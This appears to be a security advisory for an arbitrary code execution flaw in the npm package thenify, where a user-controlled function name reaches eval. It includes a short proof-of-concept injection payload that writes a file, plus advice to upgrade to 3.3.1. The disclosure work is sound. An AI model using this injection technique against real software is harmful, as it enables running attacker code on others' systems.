SNYK-JS-THENIFY-571690
## Overview [thenify](https://www.npmjs.com/package/thenify) is a Promisify a callback-based function using any-promise. Affected versions of this package are vulnerable to Arbitrary Code Execution. The `name` argument provided to the package can be controlled by users without any sanitization, and this is provided to the `eval` function without any sanitization. ### PoC ``` var a = require("thenify"); var attack_code = "fs=require('fs');fs.writeFile('Song', 'test',function(){})"; function cur(){}; Object.defineProperty(cur, "name", { value: "fake() {" + attack_code + ";})();(function(){//"}); a(cur); ``` ## Remediation Upgrade `thenify` to version 3.3.1 or higher. ## References - [GitHub Commit](https://github.com/thenables/thenify/commit/0d94a24eb933bc835d568f3009f4d269c4c4c17a) - [Vulnerable Code](https://github.com/thenables/thenify/blob/master/index.js#L17)
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 0 |
Timeline
- Jun 15, 2020 CVE Published
- Jun 15, 2020 CVE Updated
References
- https://security.snyk.io/vuln/SNYK-JS-THENIFY-571690 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://www.npmjs.com/package/thenify vendor
- https://github.com/thenables/thenify/commit/0d94a24eb933bc835d568f3009f4d269c4c4c17a patch
- https://github.com/thenables/thenify/blob/master/index.js#L17 technical